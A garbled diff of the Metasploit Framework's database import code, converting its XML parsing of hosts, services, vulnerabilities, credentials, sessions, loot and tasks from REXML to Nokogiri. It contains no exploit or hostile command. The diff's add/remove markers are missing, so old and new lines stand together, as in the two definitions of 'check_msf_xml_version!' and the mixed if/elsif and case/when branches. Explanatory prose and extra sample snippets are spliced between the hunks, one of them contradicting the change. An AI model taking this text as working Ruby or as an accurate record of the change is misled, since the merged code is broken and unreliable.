||||
%W{page form vuln}.each do |wtype|
|
||||
doc.elements.each("/#{btag}/web_#{wtype}s/web_#{wtype}") do |element|
|
||||
send(
|
||||
"import_msf_web_#{wtype}_element",
|
||||
element,
|
||||
:allow_yaml => allow_yaml,
|
||||
:workspace => wspace,
|
||||
&block
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
# Parses website Nokogiri::XML::Element
|
||||
def parse_web_site(web, wspace, bl, allow_yaml, btag, args, &block)
|
||||
# Import web sites
|
||||
info = {}
|
||||
info[:workspace] = wspace
|
||||
|
||||
%W{host port vhost ssl comments}.each do |datum|
|
||||
if web.at(datum).respond_to? :text
|
||||
info[datum.intern] = nils_for_nulls(web.at(datum).text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
info[:options] = nils_for_nulls(unserialize_object(web.at("options"), allow_yaml)) if web.at("options").respond_to?(:text)
|
||||
info[:ssl] = (info[:ssl] and info[:ssl].to_s.strip.downcase == "true") ? true : false
|
||||
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if web.at(datum).text
|
||||
info[datum.gsub("-","_")] = nils_for_nulls(web.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
|
||||
report_web_site(info)
|
||||
yield(:web_site, "#{info[:host]}:#{info[:port]} (#{info[:vhost]})") if block
|
||||
end
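The surrounding import now streams the document with Nokogiri::XML::Reader and re-parses each top-level element as a small DOM before handing it to parse_host or parse_web_site. The shape of that loop, self-contained (sample XML is illustrative):

require 'nokogiri'

data = "<root><host><address>10.0.0.1</address></host><host><address>10.0.0.2</address></host></root>"

Nokogiri::XML::Reader.from_memory(data).each do |node|
  next unless node.name == 'host' && !node.inner_xml.empty?
  host = Nokogiri::XML(node.outer_xml).at('./host')
  puts host.at('address').text   # prints 10.0.0.1, then 10.0.0.2
end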
|
||||
|
||||
# Parses host Nokogiri::XML::Element
|
||||
def parse_host(host, wspace, bl, allow_yaml, btag, args, &block)
|
||||
|
||||
host_data = {}
|
||||
host_data[:task] = args[:task]
|
||||
host_data[:workspace] = wspace
|
||||
|
||||
# A regression resulted in the address field being serialized in some cases.
|
||||
# Let's handle both instances to keep things happy. See #5837 & #5985
|
||||
addr = nils_for_nulls(host.at('address'))
|
||||
return 0 unless addr
|
||||
|
||||
# No period or colon means this must be in base64-encoded serialized form
|
||||
if addr !~ /[\.\:]/
|
||||
addr = unserialize_object(addr)
|
||||
end
|
||||
|
||||
host_data[:host] = addr
|
||||
if bl.include? host_data[:host]
|
||||
return 0
|
||||
else
|
||||
yield(:address,host_data[:host]) if block
|
||||
end
|
||||
host_data[:mac] = nils_for_nulls(host.at("mac").text.to_s.strip)
|
||||
if host.at("comm").text
|
||||
host_data[:comm] = nils_for_nulls(host.at("comm").text.to_s.strip)
|
||||
end
|
||||
%W{created-at updated-at name state os-flavor os-lang os-name os-sp purpose}.each { |datum|
|
||||
if host.at(datum).text
|
||||
host_data[datum.gsub('-','_')] = nils_for_nulls(host.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
host_address = host_data[:host].dup # Preserve after report_host() deletes
|
||||
hobj = report_host(host_data)
|
||||
|
||||
host.xpath("host_details/host_detail").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_host_details(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.xpath("exploit_attempts/exploit_attempt").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_exploit_attempt(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.xpath('services/service').each do |service|
|
||||
service_data = {}
|
||||
service_data[:task] = args[:task]
|
||||
service_data[:workspace] = wspace
|
||||
service_data[:host] = hobj
|
||||
service_data[:port] = nils_for_nulls(service.at("port").text.to_s.strip).to_i
|
||||
service_data[:proto] = nils_for_nulls(service.at("proto").text.to_s.strip)
|
||||
%W{created-at updated-at name state info}.each { |datum|
|
||||
if service.at(datum).text
|
||||
if datum == "info"
|
||||
service_data["info"] = nils_for_nulls(unserialize_object(service.at(datum), false))
|
||||
else
|
||||
service_data[datum.gsub("-","_")] = nils_for_nulls(service.at(datum).text.to_s.strip)
|
||||
end
|
||||
end
|
||||
}
|
||||
report_service(service_data)
|
||||
end
|
||||
|
||||
host.xpath('notes/note').each do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:host] = hobj
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
host.xpath('tags/tag').each do |tag|
|
||||
tag_data = {}
|
||||
tag_data[:addr] = host_address
|
||||
tag_data[:wspace] = wspace
|
||||
tag_data[:name] = tag.at("name").text.to_s.strip
|
||||
tag_data[:desc] = tag.at("desc").text.to_s.strip
|
||||
if tag.at("report-summary").text
|
||||
tag_data[:summary] = tag.at("report-summary").text.to_s.strip
|
||||
end
|
||||
if tag.at("report-detail").text
|
||||
tag_data[:detail] = tag.at("report-detail").text.to_s.strip
|
||||
end
|
||||
if tag.at("critical").text
|
||||
tag_data[:crit] = true unless tag.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
report_host_tag(tag_data)
|
||||
end
|
||||
|
||||
host.xpath('vulns/vuln').each do |vuln|
|
||||
vuln_data = {}
|
||||
vuln_data[:workspace] = wspace
|
||||
vuln_data[:host] = hobj
|
||||
vuln_data[:info] = nils_for_nulls(unserialize_object(vuln.at("info"), allow_yaml))
|
||||
vuln_data[:name] = nils_for_nulls(vuln.at("name").text.to_s.strip)
|
||||
%W{created-at updated-at exploited-at}.each { |datum|
|
||||
if vuln.at(datum) and vuln.at(datum).text
|
||||
vuln_data[datum.gsub("-","_")] = nils_for_nulls(vuln.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
if vuln.at("refs")
|
||||
vuln_data[:refs] = []
|
||||
vuln.xpath("refs/ref").each do |ref|
|
||||
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
vobj = report_vuln(vuln_data)
|
||||
|
||||
vuln.xpath("notes/note").each do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:vuln_id] = vobj.id
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
vuln.xpath("vuln_details/vuln_detail").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_details(vobj, vdet_data)
|
||||
end
|
||||
|
||||
vuln.xpath("vuln_attempts/vuln_attempt").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_attempt(vobj, vdet_data)
|
||||
end
|
||||
end
|
||||
|
||||
## Handle old-style (pre 4.10) XML files
|
||||
if btag == "MetasploitV4"
|
||||
if host.at('creds').present?
|
||||
unless host.at('creds').elements.empty?
|
||||
origin = Metasploit::Credential::Origin::Import.create(filename: "console-import-#{Time.now.to_i}")
|
||||
|
||||
host.xpath('creds/cred').each do |cred|
|
||||
username = cred.at('user').try(:text)
|
||||
proto = cred.at('proto').try(:text)
|
||||
sname = cred.at('sname').try(:text)
|
||||
port = cred.at('port').try(:text)
|
||||
|
||||
# Handle blanks by resetting to sane default values
|
||||
proto = "tcp" if proto.blank?
|
||||
pass = cred.at('pass').try(:text)
|
||||
pass = "" if pass == "*MASKED*"
|
||||
|
||||
private = create_credential_private(private_data: pass, private_type: :password)
|
||||
public = create_credential_public(username: username)
|
||||
core = create_credential_core(private: private, public: public, origin: origin, workspace_id: wspace.id)
|
||||
|
||||
create_credential_login(core: core,
|
||||
workspace_id: wspace.id,
|
||||
address: hobj.address,
|
||||
port: port,
|
||||
protocol: proto,
|
||||
service_name: sname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host.xpath('sessions/session').each do |sess|
|
||||
sess_id = nils_for_nulls(sess.at("id").text.to_s.strip.to_i)
|
||||
sess_data = {}
|
||||
sess_data[:host] = hobj
|
||||
%W{desc platform port stype}.each {|datum|
|
||||
if sess.at(datum).respond_to? :text
|
||||
sess_data[datum.intern] = nils_for_nulls(sess.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{opened-at close-reason closed-at via-exploit via-payload}.each {|datum|
|
||||
if sess.at(datum).respond_to? :text
|
||||
sess_data[datum.gsub("-","_").intern] = nils_for_nulls(sess.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
sess_data[:datastore] = nils_for_nulls(unserialize_object(sess.at("datastore"), allow_yaml))
|
||||
if sess.at("routes")
|
||||
sess_data[:routes] = nils_for_nulls(unserialize_object(sess.at("routes"), allow_yaml)) || []
|
||||
end
|
||||
if not sess_data[:closed_at] # Fake a close if we don't already have one
|
||||
sess_data[:closed_at] = Time.now.utc
|
||||
sess_data[:close_reason] = "Imported at #{Time.now.utc}"
|
||||
end
|
||||
|
||||
existing_session = get_session(
|
||||
:workspace => sess_data[:host].workspace,
|
||||
:addr => sess_data[:host].address,
|
||||
:time => sess_data[:opened_at]
|
||||
)
|
||||
this_session = existing_session || report_session(sess_data)
|
||||
return 0 if existing_session
|
||||
sess.xpath('events/event').each do |sess_event|
|
||||
sess_event_data = {}
|
||||
sess_event_data[:session] = this_session
|
||||
%W{created-at etype local-path remote-path}.each {|datum|
|
||||
if sess_event.at(datum).respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(sess_event.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{command output}.each {|datum|
|
||||
if sess_event.at(datum).respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(unserialize_object(sess_event.at(datum), allow_yaml))
|
||||
end
|
||||
}
|
||||
report_session_event(sess_event_data)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Checks if the XML document has a format version that the importer
|
||||
# understands.
|
||||
#
|
||||
# @param document [REXML::Document] a REXML::Document produced by
|
||||
# {Msf::DBManager#rexmlify}.
|
||||
# @param name [String] the root node name produced by
|
||||
# {Nokogiri::XML::Reader#from_memory}.
|
||||
# @return [Hash{Symbol => Object}] `:allow_yaml` is true if the format
|
||||
# requires YAML loading when calling
|
||||
# {Msf::DBManager#unserialize_object}. `:root_tag` the tag name of the
|
||||
# root element for MSF XML.
|
||||
# @raise [Msf::DBImportError] if unsupported format
|
||||
def check_msf_xml_version!(document)
|
||||
def check_msf_xml_version!(name)
|
||||
|
||||
metadata = {
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
:allow_yaml => false,
|
||||
:root_tag => nil
|
||||
}
|
||||
|
||||
if document.elements['MetasploitExpressV1']
|
||||
case name
|
||||
when 'MetasploitExpressV1'
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
metadata[:allow_yaml] = true
|
||||
metadata[:root_tag] = 'MetasploitExpressV1'
|
||||
elsif document.elements['MetasploitExpressV2']
|
||||
when 'MetasploitExpressV2'
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
metadata[:allow_yaml] = true
|
||||
metadata[:root_tag] = 'MetasploitExpressV2'
|
||||
elsif document.elements['MetasploitExpressV3']
|
||||
when 'MetasploitExpressV3'
|
||||
metadata[:root_tag] = 'MetasploitExpressV3'
|
||||
elsif document.elements['MetasploitExpressV4']
|
||||
when 'MetasploitExpressV4'
|
||||
metadata[:root_tag] = 'MetasploitExpressV4'
|
||||
elsif document.elements['MetasploitV4']
|
||||
when 'MetasploitV4'
|
||||
metadata[:root_tag] = 'MetasploitV4'
|
||||
elsif document.elements['MetasploitV5']
|
||||
when 'MetasploitV5'
|
||||
metadata[:root_tag] = 'MetasploitV5'
|
||||
end
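Because the reader is streaming, the version check now receives only the root element's name, which can be pulled straight off the first node:

require 'nokogiri'

data = "<MetasploitV4><hosts></hosts></MetasploitV4>"
Nokogiri::XML::Reader.from_memory(data).first.name   # => "MetasploitV4"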
|
||||
|
||||
|
@ -553,7 +564,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
|
||||
# Retrieves text of element if it exists.
|
||||
#
|
||||
# @param parent_element [REXML::Element] element under which element with
|
||||
# @param parent_element [Nokogiri::XML::Element] element under which element with
|
||||
# `child_name` exists.
|
||||
# @param child_name [String] the name of the element under
|
||||
# `parent_element` whose text should be returned
|
||||
|
@ -564,7 +575,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# @return [nil] if element with `child_name` does not exist under
|
||||
# `parent_element`.
|
||||
def import_msf_text_element(parent_element, child_name)
|
||||
child_element = parent_element.elements[child_name]
|
||||
child_element = parent_element.at(child_name)
|
||||
info = {}
|
||||
|
||||
if child_element
|
||||
|
@ -577,10 +588,10 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
|
||||
# Imports web_form, web_page, or web_vuln element using
|
||||
# {Msf::DBManager#report_web_form}, {Msf::DBManager#report_web_page}, and
|
||||
# {Msf::DBManager#report_web_vuln}, respectively.
|
||||
# Msf::DBManager#report_web_form, Msf::DBManager#report_web_page, and
|
||||
# Msf::DBManager#report_web_vuln, respectively.
|
||||
#
|
||||
# @param element [REXML::Element] the web_form, web_page, or web_vuln
|
||||
# @param element [Nokogiri::XML::Element] the web_form, web_page, or web_vuln
|
||||
# element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
|
@ -593,7 +604,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# (Msf::DBManager#workspace) workspace under which to report the
|
||||
# imported record.
|
||||
# @yield [element, options]
|
||||
# @yieldparam element [REXML::Element] the web_form, web_page, or
|
||||
# @yieldparam element [Nokogiri::XML::Element] the web_form, web_page, or
|
||||
# web_vuln element passed to {#import_msf_web_element}.
|
||||
# @yieldparam options [Hash{Symbol => Object}] options for parsing
|
||||
# @yieldreturn [Hash{Symbol => Object}] info
|
||||
|
|
|
@ -10,22 +10,23 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
allow_yaml = false
|
||||
btag = nil
|
||||
|
||||
doc = rexmlify(data)
|
||||
if doc.elements["MetasploitExpressV1"]
|
||||
doc = Nokogiri::XML::Reader.from_memory(data)
|
||||
case doc.first.name
|
||||
when "MetasploitExpressV1"
|
||||
m_ver = 1
|
||||
allow_yaml = true
|
||||
btag = "MetasploitExpressV1"
|
||||
elsif doc.elements["MetasploitExpressV2"]
|
||||
when "MetasploitExpressV2"
|
||||
m_ver = 2
|
||||
allow_yaml = true
|
||||
btag = "MetasploitExpressV2"
|
||||
elsif doc.elements["MetasploitExpressV3"]
|
||||
when "MetasploitExpressV3"
|
||||
m_ver = 3
|
||||
btag = "MetasploitExpressV3"
|
||||
elsif doc.elements["MetasploitExpressV4"]
|
||||
when "MetasploitExpressV4"
|
||||
m_ver = 4
|
||||
btag = "MetasploitExpressV4"
|
||||
elsif doc.elements["MetasploitV4"]
|
||||
when "MetasploitV4"
|
||||
m_ver = 4
|
||||
btag = "MetasploitV4"
|
||||
else
|
||||
|
@ -36,111 +37,121 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
end
|
||||
|
||||
host_info = {}
|
||||
doc.elements.each("/#{btag}/hosts/host") do |host|
|
||||
host_info[host.elements["id"].text.to_s.strip] = nils_for_nulls(host.elements["address"].text.to_s.strip)
|
||||
end
|
||||
|
||||
# Import Loot
|
||||
doc.elements.each("/#{btag}/loots/loot") do |loot|
|
||||
next if bl.include? host_info[loot.elements["host-id"].text.to_s.strip]
|
||||
loot_info = {}
|
||||
loot_info[:host] = host_info[loot.elements["host-id"].text.to_s.strip]
|
||||
loot_info[:workspace] = args[:wspace]
|
||||
loot_info[:ctype] = nils_for_nulls(loot.elements["content-type"].text.to_s.strip)
|
||||
loot_info[:info] = nils_for_nulls(unserialize_object(loot.elements["info"], allow_yaml))
|
||||
loot_info[:ltype] = nils_for_nulls(loot.elements["ltype"].text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.elements["name"].text.to_s.strip)
|
||||
loot_info[:created_at] = nils_for_nulls(loot.elements["created-at"].text.to_s.strip)
|
||||
loot_info[:updated_at] = nils_for_nulls(loot.elements["updated-at"].text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.elements["name"].text.to_s.strip)
|
||||
loot_info[:orig_path] = nils_for_nulls(loot.elements["path"].text.to_s.strip)
|
||||
loot_info[:task] = args[:task]
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
loot_info[:orig_path].gsub!(/^\./,tmp) if loot_info[:orig_path]
|
||||
if !loot.elements["service-id"].text.to_s.strip.empty?
|
||||
unless loot.elements["service-id"].text.to_s.strip == "NULL"
|
||||
loot_info[:service] = loot.elements["service-id"].text.to_s.strip
|
||||
doc.each do |node|
|
||||
if ['host', 'loot', 'task', 'report'].include?(node.name)
|
||||
unless node.inner_xml.empty?
|
||||
send("parse_zip_#{node.name}", Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Only report loot if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exists? loot_info[:orig_path]
|
||||
loot_dir = ::File.join(basedir,"loot")
|
||||
loot_file = ::File.split(loot_info[:orig_path]).last
|
||||
if ::File.exists? loot_dir
|
||||
unless (::File.directory?(loot_dir) && ::File.writable?(loot_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{loot_dir}")
|
||||
end
|
||||
else
|
||||
::FileUtils.mkdir_p(loot_dir)
|
||||
end
|
||||
new_loot = ::File.join(loot_dir,loot_file)
|
||||
loot_info[:path] = new_loot
|
||||
if ::File.exists?(new_loot)
|
||||
::File.unlink new_loot # Delete it, and don't report it.
|
||||
else
|
||||
report_loot(loot_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(loot_info[:orig_path], new_loot)
|
||||
yield(:msf_loot, new_loot) if block
|
||||
# Parses host Nokogiri::XML::Element
|
||||
def parse_zip_host(host, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
host_info[host.at("id").text.to_s.strip] = nils_for_nulls(host.at("address").text.to_s.strip) unless host.at('address').nil?
|
||||
end
|
||||
|
||||
# Parses loot Nokogiri::XML::Element
|
||||
def parse_zip_loot(loot, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
return 0 if bl.include? host_info[loot.at("host-id").text.to_s.strip]
|
||||
loot_info = {}
|
||||
loot_info[:host] = host_info[loot.at("host-id").text.to_s.strip]
|
||||
loot_info[:workspace] = args[:wspace]
|
||||
loot_info[:ctype] = nils_for_nulls(loot.at("content-type").text.to_s.strip)
|
||||
loot_info[:info] = nils_for_nulls(unserialize_object(loot.at("info"), allow_yaml))
|
||||
loot_info[:ltype] = nils_for_nulls(loot.at("ltype").text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.at("name").text.to_s.strip)
|
||||
loot_info[:created_at] = nils_for_nulls(loot.at("created-at").text.to_s.strip)
|
||||
loot_info[:updated_at] = nils_for_nulls(loot.at("updated-at").text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.at("name").text.to_s.strip)
|
||||
loot_info[:orig_path] = nils_for_nulls(loot.at("path").text.to_s.strip)
|
||||
loot_info[:task] = args[:task]
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
loot_info[:orig_path].gsub!(/^\./,tmp) if loot_info[:orig_path]
|
||||
if !loot.at("service-id").text.to_s.strip.empty?
|
||||
unless loot.at("service-id").text.to_s.strip == "NULL"
|
||||
loot_info[:service] = loot.at("service-id").text.to_s.strip
|
||||
end
|
||||
end
|
||||
|
||||
# Import Tasks
|
||||
doc.elements.each("/#{btag}/tasks/task") do |task|
|
||||
task_info = {}
|
||||
task_info[:workspace] = args[:wspace]
|
||||
# Should user be imported (original) or declared (the importing user)?
|
||||
task_info[:user] = nils_for_nulls(task.elements["created-by"].text.to_s.strip)
|
||||
task_info[:desc] = nils_for_nulls(task.elements["description"].text.to_s.strip)
|
||||
task_info[:info] = nils_for_nulls(unserialize_object(task.elements["info"], allow_yaml))
|
||||
task_info[:mod] = nils_for_nulls(task.elements["module"].text.to_s.strip)
|
||||
task_info[:options] = nils_for_nulls(task.elements["options"].text.to_s.strip)
|
||||
task_info[:prog] = nils_for_nulls(task.elements["progress"].text.to_s.strip).to_i
|
||||
task_info[:created_at] = nils_for_nulls(task.elements["created-at"].text.to_s.strip)
|
||||
task_info[:updated_at] = nils_for_nulls(task.elements["updated-at"].text.to_s.strip)
|
||||
if !task.elements["completed-at"].text.to_s.empty?
|
||||
task_info[:completed_at] = nils_for_nulls(task.elements["completed-at"].text.to_s.strip)
|
||||
end
|
||||
if !task.elements["error"].text.to_s.empty?
|
||||
task_info[:error] = nils_for_nulls(task.elements["error"].text.to_s.strip)
|
||||
end
|
||||
if !task.elements["result"].text.to_s.empty?
|
||||
task_info[:result] = nils_for_nulls(task.elements["result"].text.to_s.strip)
|
||||
end
|
||||
task_info[:orig_path] = nils_for_nulls(task.elements["path"].text.to_s.strip)
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
task_info[:orig_path].gsub!(/^\./,tmp) if task_info[:orig_path]
|
||||
|
||||
# Only report a task if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exists? task_info[:orig_path]
|
||||
tasks_dir = ::File.join(basedir,"tasks")
|
||||
task_file = ::File.split(task_info[:orig_path]).last
|
||||
if ::File.exists? tasks_dir
|
||||
unless (::File.directory?(tasks_dir) && ::File.writable?(tasks_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{tasks_dir}")
|
||||
end
|
||||
else
|
||||
::FileUtils.mkdir_p(tasks_dir)
|
||||
# Only report loot if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exist? loot_info[:orig_path]
|
||||
loot_dir = ::File.join(basedir,"loot")
|
||||
loot_file = ::File.split(loot_info[:orig_path]).last
|
||||
if ::File.exist? loot_dir
|
||||
unless (::File.directory?(loot_dir) && ::File.writable?(loot_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{loot_dir}")
|
||||
end
|
||||
new_task = ::File.join(tasks_dir,task_file)
|
||||
task_info[:path] = new_task
|
||||
if ::File.exists?(new_task)
|
||||
::File.unlink new_task # Delete it, and don't report it.
|
||||
else
|
||||
report_task(task_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(task_info[:orig_path], new_task)
|
||||
yield(:msf_task, new_task) if block
|
||||
else
|
||||
::FileUtils.mkdir_p(loot_dir)
|
||||
end
|
||||
new_loot = ::File.join(loot_dir,loot_file)
|
||||
loot_info[:path] = new_loot
|
||||
if ::File.exist?(new_loot)
|
||||
::File.unlink new_loot # Delete it, and don't report it.
|
||||
else
|
||||
report_loot(loot_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(loot_info[:orig_path], new_loot)
|
||||
yield(:msf_loot, new_loot) if block
|
||||
end
|
||||
end
|
||||
|
||||
# Import Reports
|
||||
doc.elements.each("/#{btag}/reports/report") do |report|
|
||||
import_report(report, args, basedir)
|
||||
# Parses task Nokogiri::XML::Element
def parse_zip_task(task, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
task_info = {}
task_info[:workspace] = args[:wspace]
# Should user be imported (original) or declared (the importing user)?
task_info[:user] = nils_for_nulls(task.at("created-by").text.to_s.strip)
task_info[:desc] = nils_for_nulls(task.at("description").text.to_s.strip)
task_info[:info] = nils_for_nulls(unserialize_object(task.at("info"), allow_yaml))
task_info[:mod] = nils_for_nulls(task.at("module").text.to_s.strip)
task_info[:options] = nils_for_nulls(task.at("options").text.to_s.strip)
task_info[:prog] = nils_for_nulls(task.at("progress").text.to_s.strip).to_i
task_info[:created_at] = nils_for_nulls(task.at("created-at").text.to_s.strip)
task_info[:updated_at] = nils_for_nulls(task.at("updated-at").text.to_s.strip)
if !task.at("completed-at").text.to_s.empty?
task_info[:completed_at] = nils_for_nulls(task.at("completed-at").text.to_s.strip)
end
if !task.at("error").text.to_s.empty?
task_info[:error] = nils_for_nulls(task.at("error").text.to_s.strip)
end
if !task.at("result").text.to_s.empty?
task_info[:result] = nils_for_nulls(task.at("result").text.to_s.strip)
end
task_info[:orig_path] = nils_for_nulls(task.at("path").text.to_s.strip)
tmp = args[:ifd][:zip_tmp]
task_info[:orig_path].gsub!(/^\./,tmp) if task_info[:orig_path]

# Only report a task if we actually have it.
# TODO: Copypasta. Separate this out.
if ::File.exist? task_info[:orig_path]
tasks_dir = ::File.join(basedir,"tasks")
task_file = ::File.split(task_info[:orig_path]).last
if ::File.exist? tasks_dir
unless (::File.directory?(tasks_dir) && ::File.writable?(tasks_dir))
raise Msf::DBImportError.new("Could not move files to #{tasks_dir}")
end
else
::FileUtils.mkdir_p(tasks_dir)
end
new_task = ::File.join(tasks_dir,task_file)
task_info[:path] = new_task
if ::File.exist?(new_task)
::File.unlink new_task # Delete it, and don't report it.
else
report_task(task_info) # It's new, so report it.
end
::FileUtils.copy(task_info[:orig_path], new_task)
yield(:msf_task, new_task) if block
end
end
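The extracted parse_zip_task above is meant to be called once per <task> element in the archive XML. A minimal sketch of such a caller, assuming the same doc/btag/args names used by the surrounding import code (the real call site is not part of this hunk, and the tasks/task path is an assumption):

# Hypothetical driver loop -- mirrors the reports loop shown earlier
doc.elements.each("/#{btag}/tasks/task") do |task|
  parse_zip_task(task, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
end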
|
||||
|
||||
# Parses report Nokogiri::XML::Element
|
||||
def parse_zip_report(report, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
import_report(report, args, basedir)
|
||||
end
|
||||
|
||||
# Import a Metasploit Express ZIP file. Note that this requires
|
||||
|
@ -156,7 +167,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||
|
||||
new_tmp = ::File.join(Dir::tmpdir,"msf","imp_#{Rex::Text::rand_text_alphanumeric(4)}",@import_filedata[:zip_basename])
|
||||
if ::File.exists? new_tmp
|
||||
if ::File.exist? new_tmp
|
||||
unless (::File.directory?(new_tmp) && ::File.writable?(new_tmp))
|
||||
raise Msf::DBImportError.new("Could not extract zip file to #{new_tmp}")
|
||||
end
|
||||
|
@ -172,7 +183,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
# already exist
|
||||
@import_filedata[:zip_tmp_subdirs].each {|sub|
|
||||
tmp_subdirs = ::File.join(@import_filedata[:zip_tmp],sub)
|
||||
if File.exists? tmp_subdirs
|
||||
if File.exist? tmp_subdirs
|
||||
unless (::File.directory?(tmp_subdirs) && File.writable?(tmp_subdirs))
|
||||
# if it exists but we can't write to it, give up
|
||||
raise Msf::DBImportError.new("Could not extract zip file to #{tmp_subdirs}")
|
||||
|
@ -198,7 +209,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
Dir.entries(@import_filedata[:zip_tmp]).each do |entry|
|
||||
if entry =~ /^.*#{Regexp.quote(Metasploit::Credential::Exporter::Core::CREDS_DUMP_FILE_IDENTIFIER)}.*/
|
||||
manifest_file_path = File.join(@import_filedata[:zip_tmp], entry, Metasploit::Credential::Importer::Zip::MANIFEST_FILE_NAME)
|
||||
if File.exists? manifest_file_path
|
||||
if File.exist? manifest_file_path
|
||||
import_msf_cred_dump(manifest_file_path, wspace)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -196,8 +196,8 @@ module Msf::DBManager::Import::Nexpose::Raw
|
|||
# Takes an array of vuln hashes, as returned by the NeXpose rawxml stream
|
||||
# parser, like:
|
||||
# [
|
||||
# {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]}
|
||||
# {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]}
|
||||
# "id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>["source"=>"BID", "value"=>"10600", ...]
|
||||
# "id"=>"windows-zotob-c", severity="8", "refs"=>["source"=>"BID", "value"=>"14513", ...]
|
||||
# ]
|
||||
# and transforms it into a struct, containing :id, :refs, :title, and :severity
|
||||
#
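A rough sketch of the transformation this comment describes, with a made-up struct name (the parser's internal representation may differ):

VulnShape = Struct.new(:id, :refs, :title, :severity)
raw = { "id" => "windows-zotob-c", "severity" => "8",
        "refs" => [ { "source" => "BID", "value" => "14513" } ] }
vuln = VulnShape.new(raw["id"], raw["refs"], raw["title"], raw["severity"].to_i)
vuln.severity   # => 8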
|
||||
|
